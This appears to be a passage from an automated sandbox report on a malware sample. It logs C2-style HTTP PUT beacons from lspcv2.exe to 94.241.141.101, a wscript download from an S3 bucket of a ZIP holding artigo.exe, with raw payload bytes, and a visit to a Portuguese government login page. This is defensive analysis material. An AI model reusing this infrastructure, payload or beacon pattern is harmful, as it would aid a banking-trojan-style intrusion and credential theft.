                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:39.787040949 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:40.664778948 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:40 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  143192.168.2.45020894.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:39.939001083 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:39.944149017 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:40.833300114 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:40 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  144192.168.2.45020994.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:40.745074987 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:40.750411987 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:41.621280909 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:41 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  145192.168.2.45021094.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:40.781945944 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:40.788230896 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:41.694402933 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:41 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  146192.168.2.45021194.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:40.958674908 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:40.963660002 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:41.853812933 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:41 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  147192.168.2.45021294.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:41.746366978 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:41.754121065 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:42.648698092 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:42 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  148192.168.2.45021394.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:41.814990044 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:41.820504904 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:42.713119984 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:42 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  149192.168.2.45021494.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:41.970921040 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:41.975934982 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:42.879658937 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:42 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.44973016.12.9.144435332C:\Windows\System32\wscript.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:49 UTC372OUTGET /preferencia.cdr HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Accept-Language: en-ch
                                                                                                                  UA-CPU: AMD64
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                  Host: privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-11-14 13:59:49 UTC430INHTTP/1.1 200 OK
                                                                                                                  x-amz-id-2: Yp3bnhONK63OpqQbMESsfwP1+JUveVK1z3jyUagS9HjFF0ldrZRGOzh6SWTconk5sDQpTRNJsOI=
                                                                                                                  x-amz-request-id: 5NW8JQCDY35X6SHR
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:50 GMT
                                                                                                                  Last-Modified: Wed, 13 Nov 2024 12:02:39 GMT
                                                                                                                  ETag: "9d292d1bcfe5fd895369e49c0c4b7af5-2"
                                                                                                                  x-amz-server-side-encryption: AES256
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Type: binary/octet-stream
                                                                                                                  Content-Length: 18292220
                                                                                                                  Server: AmazonS3
                                                                                                                  Connection: close
                                                                                                                  2024-11-14 13:59:49 UTC16384INData Raw: 50 4b 03 04 14 00 00 00 00 00 77 57 6d 59 00 00 00 00 00 00 00 00 00 00 00 00 07 00 20 00 54 65 72 6d 6f 73 2f 55 54 0d 00 07 a3 86 34 67 aa 86 34 67 6b 86 34 67 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 50 4b 03 04 14 00 08 00 08 00 18 57 6d 59 00 00 00 00 00 00 00 00 82 fc d7 01 11 00 20 00 54 65 72 6d 6f 73 2f 61 72 74 69 67 6f 2e 65 78 65 55 54 0d 00 07 f1 85 34 67 a4 86 34 67 a3 86 34 67 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 cc 7d 09 78 54 45 b6 f0 ed 2d e9 6c dc 0e 10 0c 6e 34 02 63 10 c5 60 00 03 21 d2 9d a4 f1 36 74 20 4a 02 41 01 13 93 6e 88 84 04 3b dd 10 17 20 b1 89 72 bd b6 46 67 79 ce f2 e6 31 ce 38 e3 cc 7b 33 83 be f7 d8 9c f9 a7 9b 28 49 c0 25 c0 7b b2 cd 38 41 df 8c 37 b4 8e 11 47 08 a8 f4 7f 4e dd ba 4b 2f 61 51 df d2 df 47 6e
                                                                                                                  Data Ascii: PKwWmY Termos/UT4g4gk4guxPKWmY Termos/artigo.exeUT4g4g4gux}xTE-ln4c`!6t JAn; rFgy18{3(I%{8A7GNK/aQGn
                                                                                                                  2024-11-14 13:59:49 UTC594INData Raw: 96 58 bf 59 c6 14 65 6e 67 be 69 65 02 38 8c 78 79 12 d9 e5 c7 3c c4 81 10 8c 37 34 e8 d5 38 42 f7 a3 a5 60 15 e8 ff ea 83 31 36 00 25 cb f7 63 38 6f 95 56 ae a5 f9 d2 11 5b 7c f3 4b 7e 6d f2 53 1a 8f 35 d2 8c e3 af f0 b0 93 f7 71 fc 77 51 db 2e be 03 d5 5c 10 e2 84 20 5d e3 4e 83 24 51 7d 37 f1 d1 d0 34 38 ba 13 a6 e7 e5 f1 87 8e e5 5e 03 02 a6 82 a3 08 cc 36 48 ae be 42 29 7a ec 5f a9 f7 77 c8 45 de d4 57 91 56 84 8c 2b 02 ba 4d 02 ed 5b 6f e0 ce 9e c0 c9 b2 0b 3d e8 68 70 81 98 39 00 99 2c 96 66 0e 43 26 27 dd 8f be 15 9d e8 f2 a3 9c 40 96 e3 90 85 4a cb 41 95 d9 60 26 44 0c e8 af ac 7e f2 d6 87 0a 63 d1 49 63 6a 39 2e 7b cc 14 8b ca 47 a1 38 8a 98 81 66 bd c4 d7 7e df 1c 2a c5 e3 e7 24 1c 14 78 b9 e9 01 02 5f 66 7a 01 e0 62 30 13 d7 8c d5 3a ac d0 a0
                                                                                                                  Data Ascii: XYengie8xy<748B`16%c8oV[|K~mS5qwQ.\ ]N$Q}748^6HB)z_wEWV+M[o=hp9,fC&'@JA`&D~cIcj9.{G8f~*$x_fzb0:
                                                                                                                  2024-11-14 13:59:50 UTC16384INData Raw: a5 d1 2a af fb 40 53 fe be a6 fc cf 52 fa 3f 24 df 57 7d 0a d2 7f 43 7a 8b a4 b1 88 91 c0 75 0b a4 f4 7b e8 c0 a4 36 97 9f 06 2b 3c 8d d1 02 3c 8f d3 d8 46 84 b4 28 8d bd 6a e0 6d 32 fc 6b 9e 3e 11 82 eb dc 2e ed 3e f5 5c e9 d9 3f 57 2b 0f 78 bd 65 7d 52 1b cb de 83 27 d2 04 eb b6 dc 72 a7 24 d7 0c e9 b9 0c dd f1 2d a5 52 1a f8 a8 9e 31 57 53 5e 44 d2 f2 53 82 df fe 20 19 99 18 49 bd 27 45 59 d5 93 a6 48 f0 f7 71 e4 de 2a 75 e3 75 e3 c8 13 27 e8 65 30 6b 57 a3 a3 7e ed 12 fc 57 d1 68 08 07 29 f8 d2 ac 37 24 52 39 3f 93 6c e9 e0 fa 91 18 2b 62 48 2d da 71 0f 13 6f 3b 50 3e 6e 99 7b 1e 6c 54 3a 55 3e 1a 8f 95 91 53 e5 be 02 e9 70 f9 92 48 29 f5 51 96 72 ab 68 84 ca 91 05 9a 82 2e dc a4 07 b3 c3 7e 89 dc a6 01 1c ff 52 02 dc 86 80 b1 1a c0 b3 48 02 e7 5b 13
                                                                                                                  Data Ascii: *@SR?$W}Czu{6+<<F(jm2k>.>\?W+xe}R'r$-R1WS^DS I'EYHq*uu'e0kW~Wh)7$R9?l+bH-qo;P>n{lT:U>SpH)Qrh.~RH[
                                                                                                                  2024-11-14 13:59:50 UTC1024INData Raw: fa e1 54 cc 1f c3 37 e2 d2 f0 1c bd db 31 a9 87 1e cd f8 38 ca 24 72 05 ae 0e 7d 99 83 99 2f c4 cc 9c 99 bf 41 4e 34 4f 61 b3 ff c5 af ef 76 bd 89 e4 d0 69 eb 29 30 19 93 f7 6f e7 c9 79 6f 89 e4 7d 29 a5 3f d9 c6 93 a7 69 a5 37 27 93 61 f8 5b b8 1f 3b 36 e3 6b 4a 1e d1 83 9b 05 ec 24 f0 d1 19 c3 21 e3 46 59 9d 06 a8 30 e1 14 41 2d dd 3f 9b 69 96 c8 96 3e 8a 69 9f 92 d5 af 30 f2 af c2 e7 0b 64 89 cf 85 31 9c e0 78 77 f1 88 64 83 2e ad e1 2b d5 97 37 d2 a1 a8 fe fd ca 2b f9 f7 fd e3 71 e1 e8 b4 a1 ad 83 48 03 b8 6c 1a b7 bd f4 29 5f b2 d6 53 44 0e 9c 5c e5 37 1b 26 d7 e3 c7 0c 93 0b 49 e1 0c 7d e0 68 72 01 29 5c 09 93 0b 47 ff 96 99 fd 4f ae 37 d3 f4 47 84 84 e0 57 de f2 87 f7 da 5b 56 13 fe fb 52 85 84 c1 26 4d 48 b8 86 2f f6 77 0a 21 e1 a9 a4 90 50 8d 83
                                                                                                                  Data Ascii: T718$r}/AN4Oavi)0oyo})?i7'a[;6kJ$!FY0A-?i>i0d1xwd.+7+qHl)_SD\7&I}hr)\GO7GW[VR&MH/w!P
                                                                                                                  2024-11-14 13:59:50 UTC16384INData Raw: 26 d2 ec 97 39 c1 fa cb b7 95 b7 ba fe 6c c2 08 58 f6 4e 33 7e ea 79 cd 84 7b 88 56 8c 53 5d 37 31 b4 dc 7b bc 28 d0 4b 31 ab d7 fa bc c7 eb 5c a1 43 63 83 03 5d 2f 9b 30 4b 7c 10 be 97 06 73 52 f2 97 05 47 f8 d1 b5 fd 1b e8 ac 3c 07 04 a1 a3 1e 47 cc 65 7f 22 16 b7 60 f8 2e 98 9b 67 7a 30 dc 54 0c 8a 74 27 c1 d6 04 2e c6 9f a5 81 12 1d 52 71 60 b4 fe 5c 13 28 d4 9f 97 da c3 e8 22 db 50 63 0e 8f 81 d4 6a d2 5b ea 56 de a8 0b c5 cb ea 42 47 28 c8 79 7c 08 3c e5 d2 53 11 3e 2d 9a 1c 1f e6 b1 af ed 76 85 7a ca e2 43 f9 53 ac 3b 6e 13 4f cf a1 d2 c3 b9 f2 6b 22 1c 9b 5d 76 b4 37 0d 93 61 31 82 26 4f 85 c9 46 55 95 ef 8e 47 a3 18 0c 74 be 7c 70 67 fc 8e 6c 55 2f 2a d7 2a 41 80 e7 cb af 09 fc e7 23 c0 d3 64 ee db 24 0d e6 5a 82 69 01 98 c8 fa d0 4d 14 22 cf 73
                                                                                                                  Data Ascii: &9lXN3~y{VS]71{(K1\Cc]/0K|sRG<Ge"`.gz0Tt'.Rq`\("Pcj[VBG(y|<S>-vzCS;nOk"]v7a1&OFUGt|pglU/**A#d$ZiM"s
                                                                                                                  2024-11-14 13:59:50 UTC1024INData Raw: 86 a6 b9 ad 81 66 7c 1a 29 e6 b6 63 28 6e 42 a6 68 16 7c cd 90 d5 d3 ec ef 0e b3 58 88 4c a8 93 95 40 d1 c9 96 be 3b ec 62 31 1c 8b 65 ef 26 5d 2c 24 ab 1e 96 41 87 92 41 55 7b 53 a8 b1 ad 69 dd 37 60 60 da 21 4e 6b 57 73 5b 48 51 13 6f 3a 28 73 ab a4 38 98 52 9c 42 d1 9c b1 97 d2 18 3c 41 ca 41 e9 34 ec ef 51 a3 2f 6f 6d 09 f9 1a 5b 82 32 5a e9 ab 89 fb 29 4c 45 ac 1c 51 f0 cd 94 36 dd 03 8b 48 10 89 15 5c d8 18 5a 39 74 0d 53 07 ad 61 92 6a 24 53 93 50 33 41 a1 25 a1 86 ac 22 3b 92 d4 15 43 42 43 7d 94 58 b7 a0 65 88 c1 4c de 08 f7 be ba de 90 0d 94 be 9f bc 01 3e 47 9a f5 d8 11 93 4d 26 f7 c1 b7 5c 96 4a 3f f8 26 cb 52 db 07 df 7e a1 ed fa e0 dc 16 5a 45 73 dd 1f 88 66 d7 d2 d0 34 c4 0e 31 79 b7 b8 d8 50 35 b5 0a 5a af aa 66 ad 0a aa 51 41 65 e4 30 5f
                                                                                                                  Data Ascii: f|)c(nBh|XL@;b1e&],$AAU{Si7``!NkWs[HQo:(s8RB<AA4Q/om[2Z)LEQ6H\Z9tSaj$SP3A%";CBC}XeL>GM&\J?&R~ZEsf41yP5ZfQAe0_
                                                                                                                  2024-11-14 13:59:50 UTC16384INData Raw: 11 a9 63 0d 21 7d 69 75 36 14 75 9f b0 dd a0 83 67 5f 30 51 bf 9b 96 2d d2 2d 92 ca 26 4b 55 a7 8b 55 cd 20 2c dc 05 d4 9f 8b 91 a8 d0 0a 47 cd af 36 02 62 0c 26 6b 45 dd 22 a7 d0 74 b1 0a c9 1b 5f 51 fb d5 25 a6 d2 d7 6d 07 9f 41 ff 33 c5 fb 5d a3 fc 34 a1 dd 18 75 6a a7 95 69 f1 81 5e c2 2e d5 01 31 18 6f 21 f8 f6 24 78 f1 f9 fa 28 af 11 22 2e 60 a4 29 d3 46 5c 96 64 cf da ab e9 c7 51 fa 71 e7 44 0f a7 31 d9 9e 71 15 c2 79 0a 28 1d 39 54 15 e6 7c 1a 44 32 83 eb 88 c7 37 18 1b f6 bb b4 5c 47 7f de 8c f8 26 8e db 88 c1 f8 a6 7e 13 bc 35 dd d8 10 71 69 a3 2e 8b 4c a9 57 53 ea 45 4a 0b a2 d4 47 5d 5a b9 59 f9 7c 81 03 ee a8 d9 1d a9 32 46 ab 8c 11 14 59 22 6e 6d 92 0e 21 ba 88 bd 22 52 aa 55 9c ff 76 c2 36 96 47 ff 66 64 17 3d 28 f5 68 51 54 83 a2 1b 0e 35
                                                                                                                  Data Ascii: c!}iu6ug_0Q--&KUU ,G6b&kE"t_Q%mA3]4uji^.1o!$x(".`)F\dQqD1qy(9T|D27\G&~5qi.LWSEJG]ZY|2FY"nm!"RUv6Gfd=(hQT5
                                                                                                                  2024-11-14 13:59:50 UTC1024INData Raw: 5a 33 2a 31 2a ea a7 01 5f 56 a9 a8 dc 82 ca 35 78 b9 12 fb dd 45 d5 25 06 c5 6f de 70 0f 45 47 3c ae 2b 6f 6d 6f 09 15 3e 9d 7c 9d 2a a6 e5 db 9f 25 e9 1c 0a 7f c8 d0 ff f5 6f 04 2e a1 f0 50 eb 54 61 19 91 e7 db ae 53 5d a5 a9 d7 a9 2e 27 c1 0f 50 3a 79 dd 12 87 3d c9 ba a5 53 63 8d 95 55 fe 60 10 59 80 c2 7e e0 97 11 4b a5 db df d4 56 de da 12 f2 83 8a b9 ae 67 e5 b5 d9 56 e9 69 69 f1 07 5c 6b eb fc 6d a1 c6 d6 16 84 2e 91 4c 1c 99 71 e5 fc 90 af 6e 95 a7 a5 a1 15 0c ce 2e 9a 2c c7 e5 54 3a eb 6e 6e 6f 0c f8 13 ea 73 19 dc be bf c9 2b a6 e9 19 39 ef 53 e4 1f 50 e4 4f 2b f2 0b ba e5 fc 13 8a 7c 41 8f 9c ef 52 e4 4f 2a f2 75 7b e4 fc 7b 8a fc b2 bd f2 aa 7d 17 cd cf 46 da fd bb 94 ff 22 9e f9 ac bc 9a cf 55 e4 05 ce 24 f5 ae 9c 6b bb 6a 88 05 b6 08 39 04
                                                                                                                  Data Ascii: Z3*1*_V5xE%opEG<+omo>|*%o.PTaS].'P:y=ScU`Y~KVgVii\km.Lqn.,T:nnos+9SPO+|ARO*u{{}F"U$kj9
                                                                                                                  2024-11-14 13:59:50 UTC16384INData Raw: b9 5e 56 e3 2c 32 5b 46 23 82 b4 5c 06 30 71 1c c5 51 52 57 d5 d4 24 43 a3 a5 fd 4a 72 3e 1f d7 a5 1f d2 bd ff fd 95 b3 99 cf 69 6e e7 37 56 35 fa 55 f5 b0 b2 28 b9 de a3 65 e4 f1 57 93 f3 a9 bd 9f 19 90 ec 39 b3 5f 9b 7f 1e 7b 97 4d d9 ff 6d 3e 6d 65 70 a7 e3 53 78 7e 3c 9f e8 0f 8d 3b 66 cd e2 86 c4 0c 67 5d dd aa 35 0b 1a 6b c8 7a 9a 89 5b d4 2f bb 66 4e 45 cd 5c 8e 9b af a9 52 3a 76 51 ac fc 2c 84 28 05 b1 ad aa af ae d1 1a fe 9b fb e3 a6 2d 0a df ac 3a 8c 32 bf 47 db 3e 5b f6 26 6f 9f 5e 5d fa 93 ba f7 df ed d5 b6 8f fd d5 b3 a7 7d cc 5c 96 9b 18 41 de 9a 95 ab 1a d7 69 ea 63 d5 24 c9 5c 50 58 9d 88 6b bd fb 8c f9 75 80 c5 4f 7d 8d 3e 3f 67 ef 33 f6 6b f3 2f 64 ef 3c 7b 3f 5b fa 7d bc 9f b6 88 8b fb 81 e8 75 aa 45 9d 8c ee 25 ab 96 d7 a8 dc 38 08 96
                                                                                                                  Data Ascii: ^V,2[F#\0qQRW$CJr>in7V5U(eW9_{Mm>mepSx~<;fg]5kz[/fNE\R:vQ,(-:2G>[&o^]}\Aic$\PXkuO}>?g3k/d<{?[}uE%8
                                                                                                                  2024-11-14 13:59:50 UTC1024INData Raw: bf b1 c4 8d 98 63 2a 83 bd 4f 0d 5b 03 29 da e3 f7 74 70 ec 16 f6 14 bf b7 b1 b9 e0 33 54 d1 a2 db 11 3b a5 4b bc ae d3 7c 90 19 2c ff 81 34 0c cc 86 c0 14 dc 1d 33 27 e2 91 a9 10 d3 91 ee 67 a1 ec a5 6b 70 53 ab 3f 5f c5 56 b0 fb b3 8f cb f2 f4 39 86 60 9c 18 80 71 e2 89 63 c0 cc 5d 26 50 c8 30 ce 6c 6e 47 f5 e6 90 7e 7e c7 30 f1 30 86 6a 1a 50 c3 c5 ef ef 77 48 1b ef 90 f5 1b 67 b9 28 b6 5e ce 77 98 4a 85 7d 6e 61 97 6b b3 67 5a 9e 58 3e ad 41 28 27 87 58 d7 c2 d3 ce 8b 8f b0 a5 fe f2 69 45 b8 58 4d ee 52 f8 1b dd 06 c2 ef 42 78 bc d7 65 8c f0 8f cb f0 d4 3e 92 62 f6 51 38 66 1f 85 d5 f6 51 58 b6 8f c2 31 fb a8 f5 97 d8 6d f5 26 12 5d 8f 96 31 4e 05 ab 82 6e ba c2 fd 43 81 cf 23 78 13 0c da 28 20 93 99 d8 14 83 7a 03 4b 4d 4f a6 b7 3a bc d0 b6 3d 65 7e
                                                                                                                  Data Ascii: c*O[)tp3T;K|,43'gkpS?_V9`qc]&P0lnG~~00jPwHg(^wJ}nakgZX>A('XiEXMRBxe>bQ8fQX1m&]1NnC#x( zKMO:=e~


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.44973462.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:51 UTC706OUTGET /v2/loginForm?partID=PFAP&path=/geral/dashboard HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-11-14 13:59:51 UTC1203INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:51 GMT
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Upgrade: h2,h2c
                                                                                                                  Connection: Upgrade
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Cache-Control: no-store
                                                                                                                  Pragma: no-cache
                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Content-Language: en-US
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  Content-Type: text/html;charset=utf-8
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Set-Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; path=/; HttpOnly;SameSite=None;Secure
                                                                                                                  Set-Cookie: AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; path=/; Httponly; Secure; SameSite=strict
                                                                                                                  Set-Cookie: TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; Path=/; Secure; HTTPOnly
                                                                                                                  Set-Cookie: TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039; Secure; Path=/
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Transfer-Encoding: chunked
